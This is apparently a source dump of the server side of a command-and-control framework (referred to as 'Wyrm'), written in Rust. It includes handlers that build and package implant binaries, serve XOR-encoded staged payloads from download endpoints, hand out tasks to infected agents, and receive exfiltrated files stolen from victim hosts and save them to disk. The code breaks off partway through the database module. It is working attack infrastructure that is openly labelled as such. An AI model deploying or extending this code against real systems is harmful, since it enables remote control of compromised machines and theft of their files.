    logging::{log_admin_login_attempt, log_error_async},
    middleware::{create_new_operator, verify_password},
};
use axum::{
    Json,
    extract::{Multipart, Path, State},
    http::{
        HeaderMap, StatusCode,
        header::{CONTENT_DISPOSITION, CONTENT_TYPE},
    },
    response::{Html, IntoResponse, Response},
};
use axum_extra::extract::{
    CookieJar,
    cookie::{Cookie, SameSite},
};
use shared::{
    net::AdminLoginPacket,
    tasks::{AdminCommand, BaBData, FileUploadStagingFromClient, WyrmResult},
};

pub async fn handle_admin_commands_on_agent(
    state: State<Arc<AppState>>,
    Path(uid): Path<String>,
    command: Json<AdminCommand>,
) -> (StatusCode, Vec<u8>) {
    let response_body_serialised = admin_dispatch(Some(uid), command.0, state).await;

    (StatusCode::ACCEPTED, response_body_serialised)
}

pub async fn handle_admin_commands_without_agent(
    state: State<Arc<AppState>>,
    command: Json<AdminCommand>,
) -> (StatusCode, Vec<u8>) {
    let response_body_serialised = admin_dispatch(None, command.0, state).await;

    (StatusCode::ACCEPTED, response_body_serialised)
}

pub async fn poll_agent_notifications(
    state: State<Arc<AppState>>,
    Path(uid): Path<String>,
) -> (StatusCode, String) {
    match state.db_pool.agent_has_pending_notifications(&uid).await {
        Ok(has_pending) => {
            if has_pending || state.connected_agents.contains_agent_by_id(&uid).await {
                (StatusCode::OK, has_pending.to_string())
            } else {
                (StatusCode::NOT_FOUND, has_pending.to_string())
            }
        }
        Err(e) => {
            log_error_async(&format!("Error polling pending notifications. {e}")).await;
            (StatusCode::INTERNAL_SERVER_ERROR, "".to_string())
        }
    }
}

pub async fn build_all_binaries_handler(
    state: State<Arc<AppState>>,
    Json(data): Json<BaBData>,
) -> Response {
    let result = build_all_bins(&data.implant_key, state).await;

    match result {
        Ok(zip_bytes) => {
            //
            // Prepare the data response back to the client and send it.
            //
            let filename = format!("{}.7z", data.implant_key);
            (
                StatusCode::ACCEPTED,
                [
                    (CONTENT_TYPE, "application/x-7z-compressed".to_string()),
                    (
                        CONTENT_DISPOSITION,
                        format!("attachment; filename=\"{}\"", filename),
                    ),
                ],
                zip_bytes,
            )
                .into_response()
        }
        Err(e) => {
            log_error_async(&e).await;

            (
                StatusCode::INTERNAL_SERVER_ERROR,
                Html(format!("Error building binaries: {e}",)),
            )
                .into_response()
        }
    }
}

pub async fn admin_login(
    jar: CookieJar,
    state: State<Arc<AppState>>,
    headers: HeaderMap,
    Json(body): Json<AdminLoginPacket>,
) -> (CookieJar, Response) {
    let ip = if let Some(h) = headers.get("X-Forwarded-For") {
        h.to_str().unwrap_or("Not Found")
    } else {
        "Not found"
    };
    let username = body.username;
    let password = body.password;

    // Lookup the operator from the db, if its empty we will create the user in the inner match here.
    let operator = match state.db_pool.lookup_operator(&username).await {
        Ok(o) => o,
        Err(e) => {
            match e {
                sqlx::Error::RowNotFound => {
                    // The db is empty so create the user. The db insert function checks
                    // for us if a user already exists, if so, it will panic as we don't want anybody
                    // and everybody creating accounts! And we aren't yet multiplayer
                    // create_new_operator(username, password, state.clone()).await;
                    create_new_operator(&username, &password, state.0.clone()).await;
                    log_admin_login_attempt(&username, &password, ip, true).await;
                    // Now try get the user again, and continue execution
                    state.db_pool.lookup_operator(&username).await.unwrap()
                }
                _ => {
                    log_error_async(&format!(
                        "There was an error with the db whilst trying to log in with creds: \
                        {username} {password}. {e}",
                    ))
                    .await;
                    log_admin_login_attempt(&username, &password, ip, false).await;
                    return (jar, StatusCode::INTERNAL_SERVER_ERROR.into_response());
                }
            }
        }
    };

    // We got a result.. lets check the password
    if let Some((db_username, db_hash, db_salt)) = operator {
        // Check the username is the same as the db username, as we are doing single operator ops right now
        // we dont want to allow for easier password spraying, at least username is one additional step of
        // complexity.

        if username.ne(&db_username) {
            log_admin_login_attempt(&username, &password, ip, false).await;
            return (jar, StatusCode::NOT_FOUND.into_response());
        }

        if verify_password(&password, &db_hash, &db_salt).await {
            // At this point in here we have successfully authenticated..
            log_admin_login_attempt(&username, &password, ip, true).await;

            let sid = state.create_session_key().await;

            let cookie = Cookie::build((AUTH_COOKIE_NAME, sid))
                .path("/")
                .http_only(true)
                .same_site(SameSite::None)
                .max_age(COOKIE_TTL.try_into().unwrap())
                .secure(true)
                .build();

            let jar = jar.add(cookie);
            return (jar, (StatusCode::ACCEPTED).into_response());
        } else {
            // Bad password...
            log_admin_login_attempt(&username, &password, ip, false).await;
            return (jar, StatusCode::NOT_FOUND.into_response());
        }
    }

    //
    // Anything that falls through to this point is invalid
    //
    log_admin_login_attempt(&username, &password, ip, false).await;
    (jar, StatusCode::NOT_FOUND.into_response())
}

/// Public route that is reachable only by the admin after going through
/// the middleware, serves as a health check as to whether their token is
/// valid or not.
pub async fn is_adm_logged_in() -> Response {
    StatusCode::OK.into_response()
}

pub async fn logout() -> Response {
    StatusCode::ACCEPTED.into_response()
}

pub async fn admin_upload(
    State(state): State<Arc<AppState>>,
    mut multipart: Multipart,
) -> StatusCode {
    let mut file_bytes = Vec::new();
    let mut download_name = String::new();
    let mut api_endpoint = String::new();

    while let Some(field) = multipart.next_field().await.unwrap_or(None) {
        match field.name() {
            Some("file") => {
                let fname = field.file_name().map(|f| f.to_string());
                let bytes = field.bytes().await.unwrap_or_default();
                file_bytes = bytes.to_vec();

                if download_name.is_empty() {
                    if let Some(fname) = fname {
                        download_name = fname;
                    }
                }
            }
            Some("download_name") => download_name = field.text().await.unwrap_or_default(),
            Some("api_endpoint") => api_endpoint = field.text().await.unwrap_or_default(),
            _ => {}
        }
    }

    if download_name.is_empty() || api_endpoint.is_empty() || file_bytes.is_empty() {
        return StatusCode::BAD_REQUEST;
    }

    let data = FileUploadStagingFromClient {
        download_name,
        api_endpoint,
        file_data: file_bytes,
    };
    let res = admin_dispatch(None, AdminCommand::StageFileOnC2(data), State(state)).await;
    StatusCode::from_u16(
        serde_json::from_slice::<Option<WyrmResult<String>>>(&res)
            .map(|r| {
                if matches!(r, Some(WyrmResult::Ok(_))) {
                    202
                } else {
                    500
                }
            })
            .unwrap_or(500),
    )
    .unwrap_or(StatusCode::INTERNAL_SERVER_ERROR)
}


================================================
FILE: c2/src/api/agent_get.rs
================================================
use std::sync::Arc;

use crate::{
    agents::handle_kill_command,
    app_state::AppState,
    logging::log_error_async,
    net::{serialise_tasks_for_agent, serve_file},
};
use axum::{
    extract::{Path, Request, State},
    http::StatusCode,
    response::{IntoResponse, Response},
};

/// Handles the inbound connection, after authentication has validated the agent.
///
/// This is very much the 'end destination' for the inbound connection.
#[axum::debug_handler]
pub async fn handle_agent_get(state: State<Arc<AppState>>, request: Request) -> Response {
    // Get the agent by its header, and fetch tasks from the db
    let (agent, tasks) = match state
        .connected_agents
        .get_agent_and_tasks_by_header(request.headers(), &state.clone().db_pool, None)
        .await
    {
        Ok((a, t)) => (a, t),
        Err(e) => {
            log_error_async(&e).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    };

    // Check whether the kill command is present and the agent needs removing from the live list..
    handle_kill_command(state.connected_agents.clone(), &agent, &tasks).await;

    serialise_tasks_for_agent(tasks).await.into_response()
}

/// Handles the inbound connection when the URI contains a path. The function will check to see if the path
/// is present in either the active C2 listener endpoints, or whether it is used to serve content.
#[axum::debug_handler]
pub async fn handle_agent_get_with_path(
    state: State<Arc<AppState>>,
    Path(endpoint): Path<String>,
    request: Request,
) -> Response {
    let state_arc = Arc::clone(&state);

    //
    // First check whether the URI is in the valid GET endpoints for the agent
    //
    let endpoints = {
        let tmp = state_arc.endpoints.read().await;
        tmp.clone()
    };

    if endpoints.c2_endpoints.contains(&endpoint) {
        // There is no need to authenticate here, that is done subsequently during
        // `handle_agent_get` where we pull the agent_id from the header
        drop(endpoints);
        return handle_agent_get(state, request).await.into_response();
    }

    //
    // Now we check whether it was a request to the download URI, if it is, we can serve that content
    // over to them.
    //
    if let Some(metadata) = endpoints.download_endpoints.get(&endpoint) {
        if let Err(e) = state.db_pool.update_download_count(&endpoint).await {
            log_error_async(&format!("Could not update download count. {e}")).await;
        };

        let filename = &metadata.file_name;
        return serve_file(filename, metadata.xor_key).await.into_response();
    }

    StatusCode::BAD_GATEWAY.into_response()
}


================================================
FILE: c2/src/api/agent_post.rs
================================================
use std::sync::Arc;

use crate::{
    EXFIL_PATH,
    agents::{extract_agent_id, handle_kill_command},
    app_state::AppState,
    exfil::handle_exfiltrated_file,
    logging::log_error_async,
    net::serialise_tasks_for_agent,
};
use axum::{
    Json,
    body::Body,
    extract::{FromRequest, Multipart, Path, Request, State},
    http::{HeaderMap, StatusCode, header::CONTENT_TYPE},
    response::IntoResponse,
};
use futures::{StreamExt, TryStreamExt};
use shared::{
    net::{XorEncode, decode_http_response},
    tasks::{Command, FirstRunData},
};
use tokio::io::AsyncWriteExt;

pub async fn agent_post_handler_with_path(
    state: State<Arc<AppState>>,
    headers: HeaderMap,
    Path(endpoint): Path<String>,
    req: Request<Body>,
) -> impl IntoResponse {
    let state_arc = Arc::clone(&state);

    {
        let lock = state_arc.endpoints.read().await;
        if lock.c2_endpoints.contains(&endpoint) {
            drop(lock);
            if is_multipart(req.headers()) {
                match Multipart::from_request(req, &state).await {
                    Ok(mp) => return receive_exfil(mp).await.into_response(),
                    Err(_) => return StatusCode::BAD_REQUEST.into_response(),
                }
            }

            let json = match Json::<Vec<Vec<u8>>>::from_request(req, &state).await {
                Ok(payload) => payload,
                Err(_) => return StatusCode::BAD_REQUEST.into_response(),
            };

            return handle_agent_post_standard(state, headers, json)
                .await
                .into_response();
        }
    }

    // endpoint not found / valid
    StatusCode::BAD_GATEWAY.into_response()
}

pub async fn agent_post_handler(
    state: State<Arc<AppState>>,
    headers: HeaderMap,
    req: Request<Body>,
) -> impl IntoResponse {
    if is_multipart(req.headers()) {
        match Multipart::from_request(req, &state).await {
            Ok(mp) => return receive_exfil(mp).await.into_response(),
            Err(_) => return StatusCode::BAD_REQUEST.into_response(),
        }
    }

    let json = match Json::<Vec<Vec<u8>>>::from_request(req, &state).await {
        Ok(payload) => payload,
        Err(_) => return StatusCode::BAD_REQUEST.into_response(),
    };

    match handle_agent_post_standard(state, headers, json).await {
        Ok(r) => r.into_response(),
        Err(e) => {
            log_error_async(&e).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    }
}

async fn handle_agent_post_standard(
    state: State<Arc<AppState>>,
    headers: HeaderMap,
    Json(payload): Json<Vec<Vec<u8>>>,
) -> Result<Vec<u8>, String> {
    let cl = state.clone();

    // We check the payload length later in an assert to make sure there is no incorrect state going on.
    let payload_len = payload.len();

    for item in payload {
        let decoded = item.xor_network_stream();

        let mut task = decode_http_response(&decoded);

        //
        // First we check here whether the agent is connecting for the FIRST time since it was exited.
        // For example, from a reboot, or from killing the process.
        // This does not mean, first time ever seen like full stop, that doesn't matter.
        //
        // We split the separation because we don't want to start making things completed as below with
        // `mark_task_completed`, or adding to the completed pool, as this task will never exist in the database.
        // It serves only the implant itself.
        //
        // NOTE: This branch will RETURN from the processing of the beacons tasks; in theory there should ONLY
        // ever be this one `Command` sent up to the C2 on first connect, so it should be fine - I cannot see
        // any circumstance where other tasks will be pending processing along-with this command, unless we mess
        // up and accidentally write this task somewhere we shouldn't. If that happens, hopefully this comment
        // will help debug :).
        //
        if task.command == Command::AgentsFirstSessionBeacon {
            // Validate the state that there is only 1 task.
            // The invalid state will brick implants, so forces the bug to be reviewed if it appears.
            // But.. this should never appear.
            assert!(payload_len == 1);

            let Some(metadata) = task.metadata else {
                return Err("Task metadata was None".to_string());
            };

            let first_run_data: FirstRunData = match serde_json::from_str(&metadata) {
                Ok(d) => d,
                Err(e) => panic!("Failed to deserialise first run data from string. {e}"),
            };

            // Serialise the tasks and send them back
            let (agent, tasks) = state
                .connected_agents
                .get_agent_and_tasks_by_header(&headers, &cl.db_pool, Some(first_run_data))
                .await?;

            let mut init_tasks = agent.get_config_data();
            if let Some(mut tasks) = tasks {
                init_tasks.append(&mut tasks);
            }

            return Ok(serialise_tasks_for_agent(Some(init_tasks)).await);
        }

        // Handle file exfil - save to disk and remove the exfil bytes, we dont want to store those
        // in the database if we are saving the file to disk.
        if task.command == Command::Pull {
            handle_exfiltrated_file(&mut task).await;
        }

        // If we have console messages, we need to explicitly put these in as a new task; although it isn't
        // a task strictly speaking, not doing so breaks the current model
        if task.command == Command::ConsoleMessages {
            let uid = extract_agent_id(&headers)?;
            let id = state
                .db_pool
                .add_task_for_agent_by_id(&uid, Command::ConsoleMessages, None)
                .await
                .map_err(|e| format!("Failed to add task for agent by ID: {uid} {e}"))?;

            // Overwrite the task ID from 1 to the new one
            task.id = id;
        }

        //
        // Command::AgentsFirstSessionBeacon was not present, so continue to
        //

        if let Err(e) = state.db_pool.mark_task_completed(&task).await {
            {
                log_error_async(&format!(
                    "Failed to complete task in db where task ID = {}. {e}",
                    task.id
                ))
                .await;
            }
        }

        // Get a copy of the agent
        let agent_id = extract_agent_id(&headers)?;
        if let Err(e) = state.db_pool.add_completed_task(&task, &agent_id).await {
            log_error_async(&format!(
                "Failed to add task results to completed table where task ID = {}. {e}",
                task.id
            ))
            .await
        }
    }

    //
    // Get any additional tasks from the database.
    //
    let (agent, tasks) = state
        .connected_agents
        .get_agent_and_tasks_by_header(&headers, &cl.db_pool, None)
        .await?;

    //
    // Check whether the kill command is present and the agent needs removing from the live list..
    //
    handle_kill_command(state.connected_agents.clone(), &agent, &tasks).await;

    //
    // Serialise the response and return it
    //
    Ok(serialise_tasks_for_agent(tasks).await)
}

async fn receive_exfil(mut mp: Multipart) -> Result<StatusCode, StatusCode> {
    let mut hostname: Option<String> = None;
    let mut source_path: Option<String> = None;

    while let Some(field) = mp.next_field().await.map_err(|_| StatusCode::BAD_REQUEST)? {
        match field.name() {
            Some("hostname") => {
                hostname = Some(field.text().await.map_err(|_| StatusCode::BAD_REQUEST)?)
            }
            Some("source_path") => {
                source_path = Some(field.text().await.map_err(|_| StatusCode::BAD_REQUEST)?)
            }
            Some("file") => {
                let host = hostname.as_deref().ok_or(StatusCode::BAD_REQUEST)?;
                let path = source_path.as_deref().ok_or(StatusCode::BAD_REQUEST)?;

                let mut dest = format!("{EXFIL_PATH}/{host}/{path}");
                dest = dest.replace(r"C:\", "").replace('\\', "/");
                if let Some(parent) = std::path::Path::new(&dest).parent() {
                    tokio::fs::create_dir_all(parent)
                        .await
                        .map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
                }

                let mut out = tokio::fs::File::create(&dest)
                    .await
                    .map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;

                let mut stream = field.into_stream();
                while let Some(chunk) = stream.next().await {
                    out.write_all(&chunk.map_err(|_| StatusCode::BAD_REQUEST)?)
                        .await
                        .map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
                }
            }
            _ => {}
        }
    }

    Ok(StatusCode::OK)
}

fn is_multipart(headers: &HeaderMap) -> bool {
    headers
        .get(CONTENT_TYPE)
        .and_then(|v| v.to_str().ok())
        .map(|v| v.starts_with("multipart/"))
        .unwrap_or(false)
}


================================================
FILE: c2/src/api/mod.rs
================================================
pub mod admin_routes;
pub mod agent_get;
pub mod agent_post;


================================================
FILE: c2/src/app_state.rs
================================================
use std::{
    collections::{HashMap, HashSet},
    env,
    path::PathBuf,
    sync::Arc,
    time::{Duration, Instant},
};

use rand::{Rng, distr::Alphanumeric};
use tokio::{
    sync::{Mutex, RwLock},
    time::sleep,
};

use crate::{
    COOKIE_TTL, FILE_STORE_PATH,
    agents::AgentList,
    db::Db,
    logging::log_error_async,
    profiles::{Profile, add_listeners_from_profiles, add_tokens_from_profiles},
};

pub struct AppState {
    /// The agents currently connected to the C2 which are able to be interacted with
    pub connected_agents: Arc<AgentList>,
    /// Database pool
    pub db_pool: Db,
    pub endpoints: RwLock<Endpoints>,
    /// Tokens added during the agent creation wizard in which validate agents who are authorised to talk to the C2
    pub agent_tokens: RwLock<HashSet<String>>,
    pub profile: RwLock<Profile>,
    sessions: Arc<Mutex<HashMap<String, Instant>>>,
}

#[derive(Debug, Clone)]
pub struct DownloadEndpointData {
    pub file_name: String,
    pub internal_name: String,
    pub xor_key: Option<u8>,
}

impl DownloadEndpointData {
    pub fn new(file_name: &str, internal_name: &str, xor_key: Option<u8>) -> Self {
        Self {
            file_name: file_name.into(),
            internal_name: internal_name.into(),
            xor_key,
        }
    }
}

#[derive(Debug, Clone)]
pub struct Endpoints {
    /// API endpoints which can be polled by the agent to check in / get tasks / POST data
    pub c2_endpoints: HashSet<String>,
    /// `HashMap<endpoint, DownloadEndpointData>` - A collection of URI endpoints,
    /// not including a /, which can serve agents over HTTP(s).
    pub download_endpoints: HashMap<String, DownloadEndpointData>,
}

impl Endpoints {
    /// Searches for, and formats with a leading `/` a download endpoint if it exists.
    ///
    /// # Returns
    /// - `Some` containing `/download_endpoint` if it exists.
    /// - `None` if the endpoint was not found.
    pub fn find_format_download_endpoint(&self, needle: &str) -> Option<String> {
        for row in self.download_endpoints.iter() {
            if row.0.eq(needle) {
                // The URI doesn't include the leading /, so we add it here
                return Some(format!("/{}", row.0));
            }
        }

        None
    }

    pub async fn read_staged_file_by_file_name(&self, needle: &str) -> Result<Vec<u8>, String> {
        //
        // Note internal name is NOT used.. so filename it is
        // TODO rm internal_name from the DownloadEndpointData if not needed
        //
        for (_, v) in self.download_endpoints.iter() {
            if v.file_name == needle {
                let mut path = PathBuf::from(FILE_STORE_PATH);
                path.push(&v.file_name);

                let tool_data = match tokio::fs::read(&path).await {
                    Ok(f) => f,
                    Err(e) => {
                        return Err(format!("Could not read file {}, {e}", path.display()));
                    }
                };

                return Ok(tool_data);
            }
        }

        Err(format!(
            "Could not find {needle} in staged resources by internal name"
        ))
    }
}

impl AppState {
    pub async fn from(db_pool: Db, profile: Profile) -> Self {
        // Fetch the endpoints from the database that we are going to use. If none are setup, it will
        // default to `::new()` for each type.
        let (mut c2_endpoints, download_endpoints, mut agent_tokens) =
            db_pool.get_agent_related_db_cfg().await.unwrap();

        // Add any listener URIs specified in the profile(s)
        add_listeners_from_profiles(&mut c2_endpoints, &profile);
        add_tokens_from_profiles(&mut agent_tokens, &profile);

        let endpoints = Endpoints {
            c2_endpoints,
            download_endpoints,
        };

        let profile = RwLock::new(profile);

        let sessions = Arc::new(Mutex::new(HashMap::new()));

        Self {
            db_pool,
            connected_agents: Arc::new(AgentList::default()),
            endpoints: RwLock::new(endpoints),
            agent_tokens: RwLock::new(agent_tokens),
            profile,
            sessions,
        }
    }

    pub fn track_sessions(&self) {
        let sessions: Arc<Mutex<HashMap<String, Instant>>> = self.sessions.clone();
        tokio::spawn(async move {
            loop {
                let now = Instant::now();
                {
                    let mut lock = sessions.lock().await;
                    lock.retain(|_, value| now.duration_since(*value) < COOKIE_TTL);
                }

                sleep(Duration::from_secs(60)).await;
            }
        });
    }

    pub async fn create_session_key(&self) -> String {
        let mut lock = self.sessions.lock().await;

        // Loop until we generate a unique key (1024 alphanumeric character space) which is not already in the store
        let sid = loop {
            let rng = rand::rng();
            let key: String = rng
                .sample_iter(&Alphanumeric)
                .take(1024)
                .map(char::from)
                .collect();

            if lock.try_insert(key.clone(), Instant::now()).is_ok() {
                break key;
            }
        };

        sid
    }

    /// Determines whether the presented `key` is valid in the current sessions on
    /// the server.
    pub async fn has_session(&self, key: &str) -> bool {
        let lock = self.sessions.lock().await;

        let key = key
            .strip_prefix("session=")
            .expect("could not find prefix session=");

        lock.contains_key(key)
    }

    pub async fn remove_session(&self, key: &str) {
        let mut lock = self.sessions.lock().await;

        let key = key
            .strip_prefix("session=")
            .expect("could not find prefix session=");

        let _ = lock.remove(key);
    }
}

/// Continually monitors for when an agent hasn't checked in after an appropriate period and will automatically remove
/// it from the list of live agents.
pub async fn detect_stale_agents(state: Arc<AppState>) {
    // The duration to sleep the async task which will check whether we need to remove an agent from the
    // live list.
    const LOOP_SLEEP_SECONDS: u64 = 10;

    loop {
        {
            state.connected_agents.mark_agents_stale().await;
            tokio::time::sleep(Duration::from_secs(LOOP_SLEEP_SECONDS)).await;
        }
    }
}


================================================
FILE: c2/src/db.rs
================================================
//! All database related functions

use std::{
    collections::{HashMap, HashSet},
    env,
    time::Duration,
};

use chrono::{DateTime, Utc};
use shared::tasks::{Command, FirstRunData, NewAgentStaging, Task};
use shared_c2_client::{NotificationsForAgents, StagedResourceData};
use sqlx::{Pool, Postgres, Row, migrate::Migrator, postgres::PgPoolOptions};

use crate::{
    agents::Agent,
    app_state::DownloadEndpointData,
    logging::{print_failed, print_info, print_success},
};

const MAX_DB_CONNECTIONS: u32 = 30;
const DB_ACQUIRE_TIMEOUT_SECS: u64 = 3;
const DB_STATEMENT_TIMEOUT_MS: u64 = 30_000;
static MIGRATOR: Migrator = sqlx::migrate!("./migrations");

pub struct Db {
    pool: Pool<Postgres>,
}

impl Db {
    /// Establish the connection to the Postgres db
    pub async fn new() -> Self {
        let db_string = format!(
            "postgres://{}:{}@{}/{}",
            env::var("POSTGRES_USER").expect("could not find POSTGRES_USER"),
            env::var("POSTGRES_PASSWORD").expect("could not find POSTGRES_PASSWORD"),
            env::var("POSTGRES_HOST").expect("could not find POSTGRES_HOST"),
            env::var("POSTGRES_DB").expect("could not find POSTGRES_DB")
        );

        print_info(format!("Connecting to database..."));

        let pool = PgPoolOptions::new()
            .max_connections(MAX_DB_CONNECTIONS)
            .acquire_timeout(Duration::from_secs(DB_ACQUIRE_TIMEOUT_SECS))
            .after_connect(|conn, _meta| {
                Box::pin(async move {
                    let stmt = format!("SET statement_timeout = {}", DB_STATEMENT_TIMEOUT_MS);
                    sqlx::query(&stmt).execute(conn).await?;
                    Ok(())
                })
            })
            .connect(&db_string)
            .await
            .map_err(|e| {
                let msg = format!("Could not establish a database connection. {e}");
                print_failed(&msg);
                panic!("Could not establish a database connection. {e}");
            })
            .expect("could not setup PgPoolOptions");

        if let Err(e) = MIGRATOR.run(&pool).await {
            print_failed(&format!("Could not run db migrations. {e}"));
            panic!("Could not run db migrations. {e}");
        }

        print_success("Db connection established");

        Self { pool }
    }

    // ************* DATABASE QUERIES

    /// Get an `Agent` from the db by its id and retrieves any tasks that are pending for
    /// the agent.
    pub async fn get_agent_with_tasks_by_id(
        &self,
        id: &str,
        frd: FirstRunData,
    ) -> Result<(Agent, Option<Vec<Task>>), sqlx::Error> {
        // Get the agent
        let row = sqlx::query(
            r#"
            SELECT uid, sleep
            FROM agents
            WHERE uid = $1"#,
        )
        .bind(id)
        .fetch_one(&self.pool)
        .await?;

        let sleep: i64 = row.try_get("sleep")?;
        let sleep = sleep as u64;

        // Strictly speaking this isn't coming from the DB, but the time will close enough within
        // a reasonable degree of error.
        let last_check_in: DateTime<Utc> = Utc::now();

        // Get any tasks
        let tasks = self.get_tasks_for_agent_by_uid(id).await?;

        Ok((
            Agent {
                uid: id.to_string(),
                sleep,
                first_run_data: frd,
                last_checkin_time: last_check_in,
                is_stale: false,
            },
            tasks,
        ))
    }

    pub async fn get_tasks_for_agent_by_uid(
        &self,
        uid: &str,
    ) -> Result<Option<Vec<Task>>, sqlx::Error> {
        let rows = sqlx::query(
            r#"
            UPDATE tasks
            SET fetched = TRUE
            WHERE id IN (
                SELECT id
                FROM tasks
                WHERE agent_id = $1
                    AND fetched IS NOT TRUE
                ORDER BY id ASC
                FOR UPDATE SKIP LOCKED
            )
            RETURNING id, command_id, data
            "#,
        )
        .bind(uid)
        .fetch_all(&self.pool)
        .await?;

        if rows.is_empty() {
            return Ok(None);
        }

        let mut tasks: Vec<Task> = Vec::new();

        for row in rows {
            let task_id: i32 = row.try_get("id")?;
            let command_id: i32 = row.try_get("command_id")?;
            let metadata: Option<String> = row.try_get("data")?;

            let command = Command::from_u32(command_id as _);

            let task = Task::from(task_id, command, metadata);

            // As we are pulling tasks from the db to send back to the client; we want to make sure
            // at this point we mark any tasks as complete which are auto-completable that don't require
            // a response posted back to us
            if command.is_autocomplete() {
                self.mark_task_completed(&task)
                    .await
                    .expect("Could not complete task");
                self.add_completed_task(&task, uid)
                    .await
                    .expect("Could not add task to completed");
            }

            tasks.push(task);
        }

        tasks.sort_by_key(|task| task.id);

        Ok(Some(tasks))
    }

    pub async fn insert_new_agent(
        &self,
        id: &str,
        frd: FirstRunData,
    ) -> Result<Agent, sqlx::Error> {
        let _ = sqlx::query(
            "INSERT into agents (uid, sleep)
            VALUES ($1, $2)",
        )
        .bind(id)
        .bind(frd.e as i64)
        .execute(&self.pool)
        .await?;

        let last_checkin_time: DateTime<Utc> = Utc::now();

        Ok({
            Agent {
                uid: id.to_string(),
                sleep: frd.e,
                first_run_data: frd,
                last_checkin_time,
                is_stale: false,
            }
        })
    }

    pub async fn add_task_for_agent_by_id(
        &self,
        uid: &String,
        command: Command,
        metadata: Option<String>,
    ) -> Result<i32, sqlx::Error> {
        let row = sqlx::query(
            r#"
            INSERT into tasks (command_id, data, agent_id, fetched)
            VALUES ($1, $2, $3, FALSE)
            RETURNING id"#,
        )
        .bind(command as i32)
        .bind(metadata)
        .bind(uid)
        .fetch_one(&self.pool)
        .await?;

        let id: i32 = row.get("id");

        Ok(id)
    }

    pub async fn update_agent_sleep_time(
        &self,
        uid: &String,
        metadata: i64,
    ) -> Result<(), sqlx::Error> {
        let _ = sqlx::query(
            "UPDATE agents
            SET sleep = $1
            WHERE uid = $2",
        )
        .bind(metadata)
        .bind(uid)
        .execute(&self.pool)
        .await?;

        Ok(())
    }

    /// Sets a task to completed in the db
    pub async fn mark_task_completed(&self, task: &Task) -> Result<(), sqlx::Error> {
        let _ = sqlx::query(
            r#"
            UPDATE tasks
            SET completed = TRUE
            WHERE id = $1
        "#,
        )
        .bind(task.id)
        .execute(&self.pool)
        .await?;

        Ok(())
    }

    /// Adds a completed task into the `completed_tasks` table which stores the results
    /// and metadata associated with completed task results, to be used by the client.
    pub async fn add_completed_task(&self, task: &Task, agent_id: &str) -> Result<(), sqlx::Error> {
        let cmd_id: u32 = task.command.into();

        let _ = sqlx::query(
            r#"
            INSERT INTO completed_tasks (task_id, result, time_completed_ms, agent_id, command_id)
            VALUES ($1, $2, $3, $4, $5)
        "#,
        )
        .bind(task.id)
        .bind(task.metadata.as_deref())
        .bind(task.completed_time)
        .bind(agent_id)
        .bind(cmd_id as i32)
        .execute(&self.pool)
        .await?;

        Ok(())
    }

    /// Db query that looks whether an agent by its UID has any pending notifications
    /// that have not been polled by the client.
    pub async fn agent_has_pending_notifications(&self, uid: &String) -> Result<bool, sqlx::Error> {
        let results = sqlx::query(
            r#"
            SELECT ct.id
            FROM completed_tasks ct
            WHERE
                ct.agent_id = $1
                AND ct.client_pulled_update = FALSE
                AND ct.command_id IS NOT NULL
            LIMIT 1
        "#,
        )
        .bind(uid)
        .fetch_one(&self.pool)
        .await;

        let results = match results {
            Ok(r) => r,
            Err(e) => match e {
                sqlx::Error::RowNotFound => return Ok(false),
                _ => return Ok(false),
            },
        };

        Ok(!results.is_empty())
    }

    pub async fn pull_notifications_for_agent(
        &self,
        uid: &String,
    ) -> Result<Option<NotificationsForAgents>, sqlx::Error> {
        let mut rows: NotificationsForAgents = sqlx::query_as(
            r#"
            WITH pending AS (
                SELECT id
                FROM completed_tasks
                WHERE
                    client_pulled_update = FALSE
                    AND agent_id = $1
                    AND command_id IS NOT NULL
                ORDER BY task_id ASC
                FOR UPDATE SKIP LOCKED
            )
            UPDATE completed_tasks ct
            SET client_pulled_update = TRUE
            FROM pending
            WHERE ct.id = pending.id
            RETURNING
                ct.id AS completed_id,
                ct.task_id,
                ct.command_id,
                ct.agent_id,
                ct.result,
                ct.time_completed_ms
        "#,
        )
        .bind(uid)
        .fetch_all(&self.pool)
        .await?;

        if rows.is_empty() {
            return Ok(None);
        }

        rows.sort_by_key(|row| row.task_id);

        Ok(Some(rows))
    }

    /// Updates the agents last check-in time, both in the database, and the in memory copy of the agent.
    pub async fn update_agent_checkin_time(&self, agent: &mut Agent) -> Result<(), sqlx::Error> {
        // Update the in memory representation of the agent's last check-in
        agent.last_checkin_time = Utc::now();

        // We will use PG inbuilt now() function to keep types happy
        let _ = sqlx::query(
            r#"
            UPDATE agents
            SET last_check_in = now()
            WHERE uid = $1
            "#,
        )
        .bind(&agent.uid)
        .execute(&self.pool)
        .await?;

        Ok(())
    }

    // pub async fn get_agent_last_check_in(&self, uid: &str) -> Result<DateTime<Utc>, sqlx::Error> {
    //     let row = sqlx::query(
    //         r#"
    //         SELECT last_check_in
    //         FROM agents
    //         WHERE uid = $1
    //         "#,
    //     )
    //     .bind(uid)
    //     .fetch_one(&self.pool)
    //     .await?;

    //     let last_check_in: DateTime<Utc> = row.try_get("last_check_in")?;

    //     Ok(last_check_in)
    // }

    pub async fn add_staged_agent(&self, data: &NewAgentStaging) -> Result<(), sqlx::Error> {
        // As we are using this as a u8, and we cannot store it in the db as a u8 for some reason (?)
        // we will cast it to an i16 for storage, so we can safely convert back to a u8 without causing
        // undefined behaviour with an int overflow.

        let _ = sqlx::query(
            "INSERT into agent_staging 
                (agent_name, host, c2_endpoint, staged_endpoint, sleep_time, pe_name, port, security_token)
            VALUES 
                ($1, $2, $3, $4, $5, $6, $7, $8)
            ",
        )
        .bind(&data.implant_name)
        .bind(&data.c2_address)
        .bind(&data.c2_endpoints[0])
        .bind(&data.staging_endpoint)
        .bind(data.default_sleep_time)
        .bind(&data.pe_name)
        .bind(data.port as i16)
        .bind(&data.agent_security_token)
        .execute(&self.pool)
        .await?;

        Ok(())
    }

    /// Deletes the database row relating to a staged resource.
    ///
    /// # Returns
    /// A `string` containing the file name on the local disk of the server.
    pub async fn delete_staged_resource_by_uri(
        &self,
        download_url: &str,
    ) -> Result<String, sqlx::Error> {
        // Get the file name on disk before we delete, which will allow the file to be deleted by
        // path
        let results = sqlx::query(
            "SELECT pe_name FROM agent_staging 
            WHERE staged_endpoint = $1",
        )
        .bind(download_url)
